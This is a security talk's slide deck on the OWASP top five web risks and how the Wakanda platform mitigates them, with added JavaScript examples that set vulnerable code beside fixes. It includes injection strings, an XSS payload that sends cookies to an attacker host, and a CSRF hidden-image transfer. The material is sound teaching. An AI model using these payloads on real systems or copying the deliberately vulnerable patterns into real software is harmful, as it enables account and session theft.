Wakanda and the top 5 security risks - JS.everywhere(2012) Europe
  1. Wakanda and the Top 5 Security Risks
     by Alexandre Morgaut
  2. Presentation
     • Wakanda Community manager
     • W3C AC member
     • Web Architect
     • JS Expert, REST Lover, NoSQL Fanboy
     • W3C "jseverywhere" community group
     @amorgaut
  3. Agenda
     • The Open Web Application Security Project
     • Top 10 Application Security Risks
     • Zoom on the Top 5
       • A1 - Injection
       • A2 - Cross-Site Scripting (XSS)
       • A3 - Broken Authentication & Session Management
       • A4 - Insecure Direct Object Reference
       • A5 - Cross-Site Request Forgery (CSRF)
  4. OWASP
     • The Open Web Application Security Project
     • started in 2001 by Mark Curphey and Dennis Groves
     • includes corporations, educational organizations, and individuals
     • Cheat Sheets, Training, Books
     • AppSec Conferences
     • Top 10 Security Risks
     https://www.owasp.org
  5. Top 10 Risks
     • A1 - Injection
     • A2 - Cross-Site Scripting (XSS)
     • A3 - Broken Authentication & Session Management
     • A4 - Insecure Direct Object Reference
     • A5 - Cross-Site Request Forgery (CSRF)
     • A6 - Security Misconfiguration
     • A7 - Insecure Cryptographic Storage
     • A8 - Failure to Restrict URL Access
     • A9 - Insufficient Transport Layer Protection
     • A10 - Unvalidated Redirects and Forwards
  6. Injection
     • Attacks
       • SQL injections, JS injections
       • deferred injections
  7. SQL Injection
     The customer ID is concatenated straight into the query, inside the quotes:

       String query = "SELECT * FROM accounts WHERE custID='" + request.getParameter("id") + "'";

     A request that closes the quote and appends an always-true condition returns every account:

       http://example.com/app/accountView?id=' or '1'='1
  8. Injection
     • Attacks
       • SQL injections, JS injections
       • deferred injections
     • Prevention
       • input checks, query parameters
       • eval is evil
       • new Function() == deferred eval()
       • no dynamically created JS query expression
  9. Wakanda Security
     • NoSQL
     • Query parameters
     • User access rights at the database level
       • CRUD + execution access rights
       • Restricting queries
       • onRestrictingQuery handler
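The "new Function() == deferred eval()" point on slide 8 is the JavaScript twin of the SQL case on slide 7. The following is an added example written for this page, not Wakanda code and not the talk's own: it runs a filter over a small in-memory record set (constructed here), once by compiling a filter string with new Function(), once by binding the value as data. The account records, the custID format check and the payload are all assumptions made for the demo.

```javascript
// Added example (not Wakanda code): why "no dynamically created JS query
// expression" matters. Records, payload and the custID format are constructed.
const accounts = [
  { custID: "1001", owner: "alice", balance: 120 },
  { custID: "1002", owner: "bob",   balance: 5400 },
  { custID: "1003", owner: "carol", balance: 87 },
];

// Vulnerable: the filter is assembled as JS source and compiled with
// new Function(), i.e. a deferred eval(). User input becomes code.
function vulnerableFindByCustId(store, idFromRequest) {
  const src = "return row.custID === '" + idFromRequest + "';";
  const filter = new Function("row", src);   // deferred eval: do not do this
  return store.filter(filter);
}

// Hardened: the value is bound as data and never touches source text.
// This is the "query parameters" advice in plain JS; a real engine would
// use its own placeholder syntax for the same effect.
function safeFindByCustId(store, idFromRequest) {
  // Input check: custIDs are numeric strings in this demo (assumption).
  if (typeof idFromRequest !== "string" || !/^\d{1,12}$/.test(idFromRequest)) {
    return [];
  }
  return store.filter((row) => row.custID === idFromRequest);
}

// Constructed payload, the JS equivalent of "' or '1'='1". The compiled
// body becomes:  return row.custID === 'x' || true || '';
const INJECTION_PAYLOAD = "x' || true || '";

function demoInjection() {
  return {
    vulnerable: vulnerableFindByCustId(accounts, INJECTION_PAYLOAD).length, // 3: every row leaks
    safe: safeFindByCustId(accounts, INJECTION_PAYLOAD).length,             // 0: payload rejected
    legit: safeFindByCustId(accounts, "1002").length,                       // 1: normal lookup still works
  };
}
```

The only difference between the two functions is where the request value ends up: in the program text, or in a variable the program compares against. Everything else (the store, the comparison, the result shape) is identical, which is what makes the fix cheap to apply.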
  10. Cross-Site Scripting (XSS)
      • Attacks
        • stored, reflected, DOM based
        • JS injection in the UI
  11. XSS Attack
  12. XSS Attack
      The request parameter is written into the page markup as-is:

        (String) page += "<input name='creditcard' type='TEXT' value='" + request.getParameter("CC") + "'>";
  13. XSS Attack
        (String) page += "<input name='creditcard' type='TEXT' value='" + request.getParameter("CC") + "'>";

      A value that closes the attribute and opens a script element sends the victim's cookies to the attacker:

        http://example.com/?CC='><script>document.location='http://www.attacker.com/cgi-bin/cookie.cgi?foo='+document.cookie</script>'
  14. Cross-Site Scripting (XSS)
      • Attacks
        • stored, reflected, DOM based
        • JS injection in the UI
      • Prevention
        • validate any input
        • escape output
  15. Wakanda Security
      • Static HTML files
      • Data inclusion based on datasources
      • output escaped by default
      • Beware
        • WYSIWYG widget + on Row Draw
        • deferred effect
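Slide 14's "escape output" is the fix for the concatenation on slides 12 and 13. The following added example is not from the talk or from Wakanda: it builds the same input element two ways, first by concatenating the raw parameter, then through an HTML escaping function, and feeds both the slide's payload. The escape table and the crude "does a script tag appear" check are the example's own.

```javascript
// Added example (not Wakanda code): the reflected XSS from slide 13 and the
// "escape output" fix. Payload, markup and the check below are constructed.
const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };

// Escape the five characters that let data break out of HTML text or a
// quoted attribute. This only works if the attribute is actually quoted.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable: parameter concatenated straight into the markup (slide 13).
function vulnerableInput(cc) {
  return "<input name='creditcard' type='TEXT' value='" + cc + "'>";
}

// Hardened: identical markup, value escaped at output time.
function safeInput(cc) {
  return "<input name='creditcard' type='TEXT' value='" + escapeHtml(cc) + "'>";
}

// Constructed payload from the slide: closes the value attribute, then
// injects a script that ships document.cookie to the attacker.
const XSS_PAYLOAD =
  "'><script>document.location='http://www.attacker.com/cgi-bin/cookie.cgi?foo='+document.cookie</script>'";

// Demo-only check: does the output contain an actual <script> element?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

function demoXss() {
  return {
    vulnerableInjected: containsScriptTag(vulnerableInput(XSS_PAYLOAD)),   // true: script element in the page
    safeInjected: containsScriptTag(safeInput(XSS_PAYLOAD)),               // false: "&lt;script&gt;" is inert text
    safeRoundTrip: safeInput("4111 1111").includes("value='4111 1111'"),  // true: normal values unchanged
  };
}
```

Escaping belongs at the point where data meets markup, which is why slide 15 lists "output escaped by default" as the platform property to rely on; the "Beware" items on that slide are exactly the places where a widget writes raw HTML and the default no longer applies.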
  16. Broken Authentication & Session Management
      • Attacks
        • session fixation in URL or form
        • session hijacking
  17. Broken Authentication & Session Management
      A session ID carried in the URL leaks through logs, referrers and shared links:

        http://example.com/sale/saleitems;jsessionid=2P0OC2JDPXM0OQSNDLPSKHCJUN2JV?dest=Hawaii
  18. Broken Authentication & Session Management
      • Attacks
        • session fixation in URL or form
        • session hijacking
      • Prevention
        • check session owner
        • session in HttpOnly cookie
        • reasonable timeout
  19. Wakanda Security
      • Session IDs managed automatically
        • HttpOnly restriction
        • No session ID in URL or form
        • Check of user session owner
        • Check of user-agent session owner
  20. Insecure Direct Object Reference
      • Attacks
        • changing the URL of the accessed resource
  21. Insecure Direct Object Reference
  22. Insecure Direct Object Reference
      The query is parameterized, so there is no injection, but nothing checks that the account belongs to the caller:

        String query = "SELECT * FROM accts WHERE account = ?";
        PreparedStatement pstmt = connection.prepareStatement(query, ...);
        pstmt.setString(1, request.getParameter("acct"));
        ResultSet results = pstmt.executeQuery();
  23. Insecure Direct Object Reference
        String query = "SELECT * FROM accts WHERE account = ?";
        PreparedStatement pstmt = connection.prepareStatement(query, ...);
        pstmt.setString(1, request.getParameter("acct"));
        ResultSet results = pstmt.executeQuery();

      Any authenticated user can read any account simply by changing the parameter:

        http://example.com/app/accountInfo?acct=notmyacct
  24. Insecure Direct Object Reference
      • Attacks
        • changing the URL of the accessed resource
      • Prevention
        • indirect resource references
        • check access rights on every resource access
  25. Wakanda Security
      • Access always checked by the REST API
      • User authenticated at database level
      • Restricting queries
        • Extended DataClass
        • Current user or current group check
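Slide 24 names two defenses and slide 25 says Wakanda applies the check through a user or group restriction on the query. The following added example, written for this page and not taken from Wakanda, shows the slide 23 lookup with no check beside both defenses: an ownership predicate added to the lookup, and an indirect reference where the client only ever sees an index into its own account list. The account records and user names are constructed.

```javascript
// Added example (not Wakanda code): slide 24's two defenses in plain JS.
// Account records, owners and the "notmyacct" id are constructed.
const accts = [
  { account: "acct-alice-1", owner: "alice", balance: 100 },
  { account: "acct-alice-2", owner: "alice", balance: 2500 },
  { account: "notmyacct",    owner: "bob",   balance: 9000 },
];

// Direct reference, no check: the slide 23 query. Whatever ?acct= names comes back.
function vulnerableAccountInfo(acctParam) {
  return accts.find((a) => a.account === acctParam) || null;
}

// Defense 1: the owner predicate is part of the lookup itself, so the check
// cannot be forgotten at a call site ("current user or current group check").
function checkedAccountInfo(currentUser, acctParam) {
  const a = accts.find((x) => x.account === acctParam && x.owner === currentUser);
  return a || null;   // a foreign account looks exactly like a missing one
}

// Defense 2: indirect reference. The client only sees per-user indexes
// (0, 1, ...); the server maps them back to real account ids.
function indirectMapFor(currentUser) {
  return accts.filter((a) => a.owner === currentUser).map((a) => a.account);
}

function indirectAccountInfo(currentUser, indexParam) {
  const map = indirectMapFor(currentUser);
  const i = Number(indexParam);
  if (!Number.isInteger(i) || i < 0 || i >= map.length) return null;
  return accts.find((a) => a.account === map[i]) || null;
}

function demoIdor() {
  const alice = "alice";
  const leaked = vulnerableAccountInfo("notmyacct");
  const indirect = indirectAccountInfo(alice, "1");
  const own = checkedAccountInfo(alice, "acct-alice-2");
  return {
    vulnerable: leaked ? leaked.owner : null,                // "bob": another user's account leaks
    checked: checkedAccountInfo(alice, "notmyacct"),         // null
    own: own ? own.balance : null,                           // 2500
    indirect: indirect ? indirect.account : null,            // "acct-alice-2": index 1 of alice's list
    outOfRange: indirectAccountInfo(alice, "2"),             // null: alice has only two accounts
    notANumber: indirectAccountInfo(alice, "notmyacct"),     // null
  };
}
```

The parameterized statement on slides 22 and 23 is a complete fix for A1 and no fix at all for A4; the two risks are independent, and the example keeps them apart by leaving the lookup parameterized in all three variants and changing only what the query is allowed to return.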
  26. Cross-Site Request Forgery (CSRF)
      • Attacks
        • HTTP request sent unintentionally by the victim's browser
  27. Cross-Site Request Forgery (CSRF)
  28. Cross-Site Request Forgery (CSRF)
      Transfer API
  29. Cross-Site Request Forgery (CSRF)
      Transfer API: a GET request carries out the transfer, authenticated only by the session cookie:

        http://app.com/transferFunds?amount=1500&destAccount=4673243243
  30. Cross-Site Request Forgery (CSRF)
      Transfer API
        http://app.com/transferFunds?amount=1500&destAccount=4673243243

      The attacker gives the victim a "picture" URL on a page the victim visits.
  31. Cross-Site Request Forgery (CSRF)
      Transfer API
        http://app.com/transferFunds?amount=1500&destAccount=4673243243

      The "picture" is an invisible image whose URL is the transfer request; the browser sends it with the victim's cookies:

        <img src="http://app.com/transferFunds?amount=1500&destAccount=AttackerAccount#" width="0" height="0">
  32. Cross-Site Request Forgery (CSRF)
      • Attacks
        • HTTP request sent unintentionally by the victim's browser
      • Prevention
        • validate any input
        • use URL manipulation APIs
        • escape output
        • use tokens in forms
  33. Top 10 Risks
      https://www.owasp.org/index.php/Top_10_2010-Main
      https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project